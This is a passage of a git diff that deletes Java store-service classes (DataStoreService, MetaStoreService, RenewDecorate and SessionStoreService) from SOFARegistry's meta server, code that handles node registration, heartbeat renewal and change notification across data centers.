dataNodeRepositoryMap.forEach((dataCenter, dataNodeRepository) -> { - - if (localDataCenter.equalsIgnoreCase(dataCenter)) { - - nodeChangeResult.setVersion(dataNodeRepository.getVersion()); - } - versionMap.put(dataCenter, dataNodeRepository.getVersion()); - - Map> dataMap = dataNodeRepository.getNodeMap(); - Map newMap = new ConcurrentHashMap<>(); - dataMap.forEach((ip, dataNode) -> newMap.put(ip, dataNode.getRenewal())); - pushNodes.put(dataCenter, newMap); - }); - - nodeChangeResult.setNodes(pushNodes); - - nodeChangeResult.setDataCenterListVersions(versionMap); - - nodeChangeResult.setLocalDataCenter(localDataCenter); - - } finally { - read.unlock(); - } - - return nodeChangeResult; - } - - @Override - public void pushNodeListChange() { - NodeOperator fireNode; - if ((fireNode = dataConfirmStatusService.peekConfirmNode()) != null) { - LOGGER.info("Now:type {},node {},Push queue:{}", fireNode.getNodeOperate(), fireNode - .getNode().getNodeUrl().getIpAddress(), - dataConfirmStatusService.getAllConfirmNodes()); - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - Map> map = nodeChangeResult.getNodes(); - Map addNodes = map.get(nodeConfig.getLocalDataCenter()); - if (addNodes != null) { - LOGGER.info("addNodes:{}", addNodes.keySet()); - Map previousNodes = dataConfirmStatusService.putExpectNodes( - fireNode.getNode(), addNodes); - - if (!previousNodes.isEmpty()) { - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("push Type:{},peek:{},list{}", fireNode.getNodeOperate(), - fireNode.getNode().getNodeUrl().getIpAddress(), previousNodes.keySet()); - } - firePushDataListTask(fireNode, nodeChangeResult, previousNodes, true); - - } - } - - firePushSessionListTask(nodeChangeResult, fireNode.getNodeOperate().toString()); - } - } - - @Override - public void confirmNodeStatus(String ipAddress, String confirmNodeIp) { - NodeOperator fireNode = dataConfirmStatusService.peekConfirmNode(); - if (fireNode != null) { - String fireNodeIp = fireNode.getNode().getIp(); - if (fireNodeIp != null && !fireNodeIp.equals(confirmNodeIp)) { - LOGGER - .info( - "Confirm node already be remove from queue!Receive ip:{},expect confirm ip:{},now peek ip:{}", - ipAddress, confirmNodeIp, fireNodeIp); - return; - } - Map waitNotifyNodes = dataConfirmStatusService - .getExpectNodes(fireNode.getNode()); - - if (waitNotifyNodes != null) { - LOGGER.info("Peek node:{} oper:{},waitNotifyNodes:{},confirm ip:{}", fireNode - .getNode().getNodeUrl().getIpAddress(), fireNode.getNodeOperate(), - waitNotifyNodes.keySet(), ipAddress); - - Set removeIp = getRemoveIp(waitNotifyNodes.keySet()); - removeIp.add(ipAddress); - - waitNotifyNodes = dataConfirmStatusService.removeExpectConfirmNodes( - fireNode.getNode(), removeIp); - - if (waitNotifyNodes.isEmpty()) { - //all node be notified,or some disconnect node be evict - try { - if (null != dataConfirmStatusService - .removeExpectNodes((dataConfirmStatusService.pollConfirmNode()) - .getNode())) { - //add init status must notify - if (fireNode.getNodeOperate() == DataOperator.ADD) { - notifyConfirm(fireNode.getNode()); - } - LOGGER.info("Data node {} operator {} be confirm,Dump queue:{}", - fireNode.getNode().getNodeUrl().getIpAddress(), - fireNode.getNodeOperate(), - dataConfirmStatusService.getAllConfirmNodes()); - } - } catch (InterruptedException e) { - LOGGER.error("Notify expect confirm status node {} interrupted!", - fireNode.getNode()); - } - } - } else { - try { - //wait node not exist, - dataConfirmStatusService.pollConfirmNode(); - LOGGER - .info( - "Data node {} operator {} poll!not other node need be notify!Confirm ip {},Dump queue:{}", - fireNode.getNode().getNodeUrl().getIpAddress(), - fireNode.getNodeOperate(), ipAddress, - dataConfirmStatusService.getAllConfirmNodes()); - } catch (InterruptedException e) { - LOGGER.error("Notify expect confirm status node " + fireNode.getNode() - + " interrupted!", e); - } - } - } - } - - private Set getRemoveIp(Set waitNotifyNodes) { - Map> map = getRunTime(); - Map addNodes = map.get(nodeConfig.getLocalDataCenter()); - if (addNodes != null && !addNodes.isEmpty()) { - return waitNotifyNodes.stream().filter(ip -> !addNodes.keySet().contains(ip)).collect(Collectors.toSet()); - } - return new HashSet<>(); - } - - private void firePushDataListTask(NodeOperator confirmNode, - NodeChangeResult nodeChangeResult, - Map targetNodes, boolean confirm) { - - //notify targetNodes change - String ip = ""; - String nodeOperate; - if (confirmNode != null) { - ip = confirmNode.getNode().getIp(); - nodeOperate = confirmNode.getNodeOperate().toString(); - } else { - nodeOperate = "OtherDataCenter update"; - } - TaskEvent taskEvent = new TaskEvent(nodeChangeResult, TaskType.DATA_NODE_CHANGE_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_NEED_CONFIRM_KEY, confirm); - taskEvent.setAttribute(Constant.PUSH_TARGET_DATA_NODE, targetNodes); - taskEvent.setAttribute(Constant.PUSH_TARGET_TYPE, NodeType.DATA); - taskEvent.setAttribute(Constant.PUSH_TARGET_OPERATOR_TYPE, nodeOperate); - taskEvent.setAttribute(Constant.PUSH_TARGET_CONFIRM_NODE, ip); - - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " NodeType:" + NodeType.DATA - + " Operator:" + nodeOperate + " confirmNode:" + ip); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void firePushSessionListTask(NodeChangeResult nodeChangeResult, String nodeOperate) { - - //notify all session node - TaskEvent taskEvent = new TaskEvent(nodeChangeResult, TaskType.DATA_NODE_CHANGE_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_TARGET_TYPE, NodeType.SESSION); - taskEvent.setAttribute(Constant.PUSH_TARGET_OPERATOR_TYPE, nodeOperate); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " NodeType:" + NodeType.SESSION - + " Operator:" + nodeOperate); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void notifyConfirm(DataNode node) { - TaskEvent taskEvent = new TaskEvent(node, TaskType.RECEIVE_STATUS_CONFIRM_NOTIFY_TASK); - - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " DataNode:" + node); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private Map> getRunTime() { - - read.lock(); - try { - ConcurrentHashMap> pushNodes = new ConcurrentHashMap<>(); - Map>> dataCenterMap = dataRepositoryService.getAllDataMap(); - - dataCenterMap.forEach((dataCenter, dataMap) -> { - - Map newMap = new ConcurrentHashMap<>(); - dataMap.forEach((ip, dataNode) -> newMap.put(ip, dataNode.getRenewal())); - pushNodes.put(dataCenter, newMap); - - }); - return pushNodes; - } finally { - read.unlock(); - } - } - - @Override - public void getOtherDataCenterNodeAndUpdate() { - - MetaNodeService metaNodeService = (MetaNodeService) ServiceFactory - .getNodeService(NodeType.META); - - Map> metaMap = nodeConfig.getMetaNodeIP(); - - if (metaMap != null && metaMap.size() > 0) { - for (String dataCenter : metaMap.keySet()) { - //get other dataCenter dataNodes - if (!nodeConfig.getLocalDataCenter().equals(dataCenter)) { - GetChangeListRequest getChangeListRequest = new GetChangeListRequest( - NodeType.DATA, dataCenter); - //trigger fetch dataCenter data list change - DataCenterNodes getDataCenterNodes = metaNodeService - .getDataCenterNodes(getChangeListRequest); - if (getDataCenterNodes != null) { - String dataCenterGet = getDataCenterNodes.getDataCenterId(); - Long version = getDataCenterNodes.getVersion(); - if (version == null) { - LOGGER.error("Request message version cant not be null!"); - return; - } - //check for scheduler get other dataCenter data node - boolean result = dataRepositoryService.checkVersion(dataCenterGet, version); - if (!result) { - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("DataCenter {} data list version {} has not updated!", - dataCenter, version); - } - return; - } - updateOtherDataCenterNodes(getDataCenterNodes); - } else { - LOGGER.error("Get DataCenter data nodes change error!null"); - throw new RuntimeException("Get null DataCenter data nodes change!"); - } - } - } - } - } - - @Override - public void updateOtherDataCenterNodes(DataCenterNodes dataCenterNodes) { - write.lock(); - try { - String dataCenter = dataCenterNodes.getDataCenterId(); - Long version = dataCenterNodes.getVersion(); - - if (version == null) { - LOGGER.error("Request message version cant not be null!"); - return; - } - - Map dataCenterNodesMap = dataCenterNodes.getNodes(); - - LOGGER.info("update version {} Other DataCenter {} Nodes {}", version, dataCenter, dataCenterNodesMap); - - Map> dataCenterNodesMapTemp = new ConcurrentHashMap<>(); - dataCenterNodesMap.forEach((ipAddress, dataNode) -> dataCenterNodesMapTemp - .put(ipAddress, new RenewDecorate(dataNode, RenewDecorate.DEFAULT_DURATION_SECS))); - dataRepositoryService.replaceAll(dataCenter, dataCenterNodesMapTemp, version); - - if (version == localDataCenterInitVersion.get()) { - //first dataCenter has init version,need not notify local data node - LOGGER.info("DataCenter {} first start up,No data node change to notify!Init version {}", dataCenter, - version); - return; - } - - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - - firePushDataListTask(null, nodeChangeResult, null, false); - - firePushSessionListTask(nodeChangeResult, "OtherDataCenterUpdate"); - } finally { - write.unlock(); - } - } - - @Override - public DataCenterNodes getDataCenterNodes() { - read.lock(); - try { - String localDataCenter = nodeConfig.getLocalDataCenter(); - - Map dataNodeRepositoryMap = dataRepositoryService - .getNodeRepositories(); - - NodeRepository dataNodeRepository = dataNodeRepositoryMap.get(localDataCenter); - - if (dataNodeRepository == null) { - //first just dataCenter exist but no data node register - DataCenterNodes dataCenterNodes = new DataCenterNodes(NodeType.DATA, localDataCenterInitVersion.get(), - localDataCenter); - dataCenterNodes.setNodes(new ConcurrentHashMap<>()); - return dataCenterNodes; - } - - DataCenterNodes dataCenterNodes = new DataCenterNodes(NodeType.DATA, dataNodeRepository.getVersion(), - localDataCenter); - - Map> dataMap = dataNodeRepository.getNodeMap(); - Map newMap = new ConcurrentHashMap<>(); - dataMap.forEach((ip, dataNode) -> newMap.put(ip, dataNode.getRenewal())); - - dataCenterNodes.setNodes(newMap); - - return dataCenterNodes; - } finally { - read.unlock(); - } - } - - /** - * Setter method for property nodeConfig. - * - * @param nodeConfig value to be assigned to property nodeConfig - */ - public void setNodeConfig(NodeConfig nodeConfig) { - this.nodeConfig = nodeConfig; - } - - /** - * Setter method for property taskListenerManager. - * - * @param taskListenerManager value to be assigned to property taskListenerManager - */ - public void setTaskListenerManager(TaskListenerManager taskListenerManager) { - this.taskListenerManager = taskListenerManager; - } - - /** - * Setter method for property dataRepositoryService. - * - * @param dataRepositoryService value to be assigned to property dataRepositoryService - */ - public void setDataRepositoryService(RepositoryService> dataRepositoryService) { - this.dataRepositoryService = dataRepositoryService; - } - - /** - * Setter method for property dataConfirmStatusService. - * - * @param dataConfirmStatusService value to be assigned to property dataConfirmStatusService - */ - public void setDataConfirmStatusService(NodeConfirmStatusService dataConfirmStatusService) { - this.dataConfirmStatusService = dataConfirmStatusService; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/MetaStoreService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/MetaStoreService.java deleted file mode 100644 index f50ce3b80..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/MetaStoreService.java +++ /dev/null @@ -1,359 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.store; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.GetChangeListRequest; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.MetaNodeService; -import com.alipay.sofa.registry.server.meta.repository.NodeRepository; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.NotSupportedException; -import java.util.Collection; -import java.util.List; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; - -/** - * - * @author shangyu.wh - * @version $Id: MetaStoreService.java, v 0.1 2018-03-02 16:41 shangyu.wh Exp $ - */ -public class MetaStoreService implements StoreService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaStoreService.class); - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock - .readLock(); - private final Lock write = readWriteLock - .writeLock(); - - @Autowired - private NodeConfig nodeConfig; - - private AtomicLong localDataCenterInitVersion = new AtomicLong( - -1L); - - @Autowired - private TaskListenerManager taskListenerManager; - - @RaftReference(uniqueId = "metaServer") - private RepositoryService> metaRepositoryService; - - @Override - public NodeType getNodeType() { - return NodeType.META; - } - - @Override - public NodeChangeResult setNodes(List metaNodes) { - NodeChangeResult nodeChangeResult; - - write.lock(); - try { - - //存放到repository(自动通过jraft同步给集群) - String dataCenter = nodeConfig.getLocalDataCenter(); - Map> dataCenterNodesMap = new ConcurrentHashMap<>(); - for (MetaNode metaNode : metaNodes) { - dataCenterNodesMap.put(metaNode.getIp(), new RenewDecorate(metaNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - } - metaRepositoryService.replaceAll(dataCenter, dataCenterNodesMap, - System.currentTimeMillis()); - - //触发通知(需要通知data/session) - nodeChangeResult = getNodeChangeResult(); - firePushDataListTask(nodeChangeResult, "addMetaNode"); - firePushSessionListTask(nodeChangeResult, "addMetaNode"); - - LOGGER.info("Set meta node list {} success!", metaNodes); - - } finally { - write.unlock(); - } - - return nodeChangeResult; - } - - @Override - public NodeChangeResult addNode(MetaNode metaNode) { - NodeChangeResult nodeChangeResult; - - String ipAddress = metaNode.getNodeUrl().getIpAddress(); - - write.lock(); - try { - //存放到repository(自动通过jraft同步给集群) - metaRepositoryService.put(ipAddress, new RenewDecorate(metaNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - - //触发通知(需要通知data/session) - nodeChangeResult = getNodeChangeResult(); - firePushDataListTask(nodeChangeResult, "addMetaNode"); - firePushSessionListTask(nodeChangeResult, "addMetaNode"); - - LOGGER.info("Add single meta node {} success!", metaNode); - - } finally { - write.unlock(); - } - - return nodeChangeResult; - } - - @Override - public boolean removeNode(String ipAddress) { - write.lock(); - try { - - //存放到repository(自动通过jraft同步给集群) - RenewDecorate dataNode = metaRepositoryService.remove(ipAddress); - - //触发通知(需要通知data/session) - if (dataNode != null) { - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - firePushDataListTask(nodeChangeResult, "removeMetaNode"); - firePushSessionListTask(nodeChangeResult, "removeMetaNode"); - LOGGER.info("Remove single meta node {} success!", dataNode.getRenewal()); - return true; - } - return false; - } finally { - write.unlock(); - } - } - - @Override - public void removeNodes(Collection nodes) { - - } - - @Override - public void confirmNodeStatus(String connectId, String ip) { - throw new NotSupportedException("Node type META not support function"); - } - - @Override - public void reNew(MetaNode node, int duration) { - } - - @Override - public Collection getExpired() { - return null; - } - - @Override - public Map getNodes() { - return null; - } - - @Override - public NodeChangeResult getNodeChangeResult() { - - NodeChangeResult nodeChangeResult = new NodeChangeResult(NodeType.META); - - String localDataCenter = nodeConfig.getLocalDataCenter(); - - Map metaRepositoryMap = metaRepositoryService.getNodeRepositories(); - - ConcurrentHashMap> pushNodes = new ConcurrentHashMap<>(); - - Map versionMap = new ConcurrentHashMap<>(); - - metaRepositoryMap.forEach((dataCenter, metaNodeRepository) -> { - - if (localDataCenter.equalsIgnoreCase(dataCenter)) { - - nodeChangeResult.setVersion(metaNodeRepository.getVersion()); - } - versionMap.put(dataCenter, metaNodeRepository.getVersion()); - - Map> dataMap = metaNodeRepository.getNodeMap(); - Map newMap = new ConcurrentHashMap<>(); - dataMap.forEach((ip, dataNode) -> newMap.put(ip, dataNode.getRenewal())); - pushNodes.put(dataCenter, newMap); - }); - - nodeChangeResult.setLocalDataCenter(localDataCenter); - - nodeChangeResult.setNodes(pushNodes); - - nodeChangeResult.setDataCenterListVersions(versionMap); - - return nodeChangeResult; - } - - @Override - public void getOtherDataCenterNodeAndUpdate() { - - MetaNodeService metaNodeService = (MetaNodeService) ServiceFactory - .getNodeService(NodeType.META); - - Map> metaMap = nodeConfig.getMetaNodeIP(); - - if (metaMap != null && metaMap.size() > 0) { - for (String dataCenter : metaMap.keySet()) { - //get other dataCenter meta - if (!nodeConfig.getLocalDataCenter().equals(dataCenter)) { - GetChangeListRequest getChangeListRequest = new GetChangeListRequest( - NodeType.META, dataCenter); - //trigger fetch dataCenter meta list change - DataCenterNodes getDataCenterNodes = metaNodeService - .getDataCenterNodes(getChangeListRequest); - if (getDataCenterNodes != null) { - String dataCenterGet = getDataCenterNodes.getDataCenterId(); - Long version = getDataCenterNodes.getVersion(); - if (version == null) { - LOGGER.error("Request message meta version cant not be null!"); - return; - } - //check for scheduler get other dataCenter meta node - boolean result = metaRepositoryService.checkVersion(dataCenterGet, version); - if (!result) { - LOGGER.debug("DataCenter {} meta list version {} has not updated!", - dataCenter, version); - return; - } - updateOtherDataCenterNodes(getDataCenterNodes); - } else { - LOGGER.error("Get DataCenter meta nodes change error!null"); - throw new RuntimeException("Get null DataCenter meta nodes change!"); - } - } - } - } - } - - @Override - public void updateOtherDataCenterNodes(DataCenterNodes dataCenterNodes) { - write.lock(); - try { - String dataCenter = dataCenterNodes.getDataCenterId(); - Long version = dataCenterNodes.getVersion(); - - if (version == null) { - LOGGER.error("Request message version cant not be null!"); - return; - } - Map dataCenterNodesMap = dataCenterNodes.getNodes(); - - LOGGER.info("update version {} Other DataCenter {} meta Nodes {}", version, dataCenter, dataCenterNodesMap); - - Map> dataCenterNodesMapTemp = new ConcurrentHashMap<>(); - - dataCenterNodesMap.forEach((ipAddress, metaNode) -> dataCenterNodesMapTemp - .put(ipAddress, new RenewDecorate(metaNode, RenewDecorate.DEFAULT_DURATION_SECS))); - metaRepositoryService.replaceAll(dataCenter, dataCenterNodesMapTemp, version); - - if (version == localDataCenterInitVersion.get()) { - //first dataCenter has init version,need not notify local data node - LOGGER.info("DataCenter {} first start up,No meta node change to notify!Init version {}", dataCenter, - version); - return; - } - - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - - firePushDataListTask(nodeChangeResult, "OtherDataCenterMetaUpdate"); - - firePushSessionListTask(nodeChangeResult, "OtherDataCenterMetaUpdate"); - } finally { - write.unlock(); - } - } - - @Override - public DataCenterNodes getDataCenterNodes() { - read.lock(); - try { - String localDataCenter = nodeConfig.getLocalDataCenter(); - - Map metaNodeRepositoryMap = metaRepositoryService - .getNodeRepositories(); - - NodeRepository metaNodeRepository = metaNodeRepositoryMap.get(localDataCenter); - - if (metaNodeRepository == null) { - DataCenterNodes dataCenterNodes = new DataCenterNodes(NodeType.META, localDataCenterInitVersion.get(), - localDataCenter); - dataCenterNodes.setNodes(new ConcurrentHashMap<>()); - - return dataCenterNodes; - } - - DataCenterNodes dataCenterNodes = new DataCenterNodes(NodeType.META, metaNodeRepository.getVersion(), - localDataCenter); - - Map> dataMap = metaNodeRepository.getNodeMap(); - Map newMap = new ConcurrentHashMap<>(); - dataMap.forEach((ip, metaNode) -> newMap.put(ip, metaNode.getRenewal())); - dataCenterNodes.setNodes(newMap); - - return dataCenterNodes; - } finally { - read.unlock(); - } - } - - private void firePushDataListTask(NodeChangeResult nodeChangeResult, String nodeOperate) { - - TaskEvent taskEvent = new TaskEvent(nodeChangeResult, TaskType.DATA_NODE_CHANGE_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_NEED_CONFIRM_KEY, false); - taskEvent.setAttribute(Constant.PUSH_TARGET_TYPE, NodeType.DATA); - taskEvent.setAttribute(Constant.PUSH_TARGET_OPERATOR_TYPE, nodeOperate); - - LOGGER.info("send " + taskEvent.getTaskType() + " NodeType:" + NodeType.DATA + " Operator:" - + nodeOperate); - - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void firePushSessionListTask(NodeChangeResult nodeChangeResult, String nodeOperate) { - - //notify all session node - TaskEvent taskEvent = new TaskEvent(nodeChangeResult, TaskType.DATA_NODE_CHANGE_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_TARGET_TYPE, NodeType.SESSION); - taskEvent.setAttribute(Constant.PUSH_TARGET_OPERATOR_TYPE, nodeOperate); - LOGGER.info("send " + taskEvent.getTaskType() + " NodeType:" + NodeType.SESSION - + " Operator:" + nodeOperate); - taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public void pushNodeListChange() { - - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/RenewDecorate.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/RenewDecorate.java deleted file mode 100644 index e642ba557..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/RenewDecorate.java +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.store; - -import java.io.Serializable; - -/** - * heartbeat info for node - * @author shangyu.wh - * @version $Id: ReNewer.java, v 0.1 2018-01-16 17:10 shangyu.wh Exp $ - */ -public class RenewDecorate implements Serializable { - - public static final int DEFAULT_DURATION_SECS = 15; - - private T renewal; - - private long beginTimestamp; - - private volatile long lastUpdateTimestamp; - - private long duration; - - /** - * use for task parameter - * @param renewal - */ - public RenewDecorate(T renewal) { - this.renewal = renewal; - } - - /** - * constructor - * @param renewal - * @param durationSECS - */ - public RenewDecorate(T renewal, long durationSECS) { - this.renewal = renewal; - this.beginTimestamp = System.currentTimeMillis(); - this.lastUpdateTimestamp = beginTimestamp; - this.duration = durationSECS * 1000; - } - - /** - * verify expired or not - * @return - */ - public boolean isExpired() { - return System.currentTimeMillis() > lastUpdateTimestamp + duration; - } - - /** - * refresh lastUpdateTimestamp - */ - public void reNew() { - lastUpdateTimestamp = System.currentTimeMillis() + duration; - } - - /** - * refresh lastUpdateTimestamp by durationSECS - * @param durationSECS - */ - public void reNew(long durationSECS) { - lastUpdateTimestamp = System.currentTimeMillis() + durationSECS * 1000; - } - - /** - * Getter method for property renewal. - * - * @return property value of renewal - */ - public T getRenewal() { - return renewal; - } - - /** - * Setter method for property renewal. - * - * @param renewal value to be assigned to property renewal - */ - public void setRenewal(T renewal) { - this.renewal = renewal; - } - - /** - * Getter method for property beginTimestamp. - * - * @return property value of beginTimestamp - */ - public long getBeginTimestamp() { - return beginTimestamp; - } - - /** - * Getter method for property lastUpdateTimestamp. - * - * @return property value of lastUpdateTimestamp - */ - public long getLastUpdateTimestamp() { - return lastUpdateTimestamp; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/SessionStoreService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/SessionStoreService.java deleted file mode 100644 index 5123a9f43..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/SessionStoreService.java +++ /dev/null @@ -1,450 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.store; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.node.NodeOperator; -import com.alipay.sofa.registry.server.meta.repository.NodeConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.repository.VersionRepositoryService; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.NotSupportedException; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: SessionStoreService.java, v 0.1 2018-01-12 14:14 shangyu.wh Exp $ - */ -public class SessionStoreService implements StoreService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionStoreService.class); - - private static final Logger TASK_LOGGER = LoggerFactory - .getLogger( - SessionStoreService.class, - "[Task]"); - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock - .readLock(); - private final Lock write = readWriteLock - .writeLock(); - @Autowired - private TaskListenerManager taskListenerManager; - @Autowired - private StoreService dataStoreService; - @Autowired - private NodeConfig nodeConfig; - - @RaftReference(uniqueId = "sessionServer") - private RepositoryService> sessionRepositoryService; - - @RaftReference(uniqueId = "sessionServer") - private VersionRepositoryService sessionVersionRepositoryService; - - @RaftReference(uniqueId = "sessionServer") - private NodeConfirmStatusService sessionConfirmStatusService; - - @Override - public NodeType getNodeType() { - return NodeType.SESSION; - } - - @Override - public NodeChangeResult setNodes(List nodes) { - throw new UnsupportedOperationException(); - } - - @Override - public NodeChangeResult addNode(SessionNode sessionNode) { - - write.lock(); - try { - String ipAddress = sessionNode.getNodeUrl().getIpAddress(); - - sessionRepositoryService.put(ipAddress, new RenewDecorate(sessionNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - - sessionVersionRepositoryService.checkAndUpdateVersions(nodeConfig.getLocalDataCenter(), - System.currentTimeMillis()); - - reNew(sessionNode, 30); - - sessionConfirmStatusService.putConfirmNode(sessionNode, DataOperator.ADD); - - } finally { - write.unlock(); - } - - return dataStoreService.getNodeChangeResult(); - } - - @Override - public boolean removeNode(String ipAddress) { - - write.lock(); - try { - RenewDecorate oldRenewDecorate = sessionRepositoryService - .remove(ipAddress); - if (oldRenewDecorate == null) { - LOGGER - .info("Remove Session node with ipAddress:" + ipAddress + " has not existed!"); - return false; - } - - sessionVersionRepositoryService.checkAndUpdateVersions(nodeConfig.getLocalDataCenter(), - System.currentTimeMillis()); - - sessionConfirmStatusService.putConfirmNode(oldRenewDecorate.getRenewal(), - DataOperator.REMOVE); - } finally { - write.unlock(); - } - - return true; - } - - @Override - public void removeNodes(Collection nodes) { - - if (nodes != null && !nodes.isEmpty()) { - write.lock(); - try { - for (Node node : nodes) { - String ipAddress = node.getNodeUrl().getIpAddress(); - RenewDecorate oldRenewDecorate = sessionRepositoryService - .remove(ipAddress); - if (oldRenewDecorate == null) { - LOGGER.warn("Remove session nodes with ipAddress:" + ipAddress - + " has not existed!"); - continue; - } - - sessionVersionRepositoryService.checkAndUpdateVersions( - nodeConfig.getLocalDataCenter(), System.currentTimeMillis()); - - sessionConfirmStatusService.putConfirmNode(oldRenewDecorate.getRenewal(), - DataOperator.REMOVE); - - //confirmNodeStatus(ipAddress, DataOperator.REMOVE); - } - } finally { - write.unlock(); - } - } - } - - @Override - public void reNew(SessionNode sessionNode, int duration) { - - write.lock(); - try { - String ipAddress = sessionNode.getNodeUrl().getIpAddress(); - RenewDecorate reNewer = sessionRepositoryService.get(ipAddress); - - if (reNewer == null) { - LOGGER.warn("ReNew session node with ipAddress:" + ipAddress - + " has not existed!It will be registered again!"); - addNode(sessionNode); - } else { - if (duration > 0) { - sessionRepositoryService.replace(ipAddress, new RenewDecorate(sessionNode, - duration)); - } else { - sessionRepositoryService.replace(ipAddress, new RenewDecorate(sessionNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - } - } - } finally { - write.unlock(); - } - } - - @Override - public Collection getExpired() { - Collection reNewerList = new ArrayList<>(); - read.lock(); - try { - Map> map = 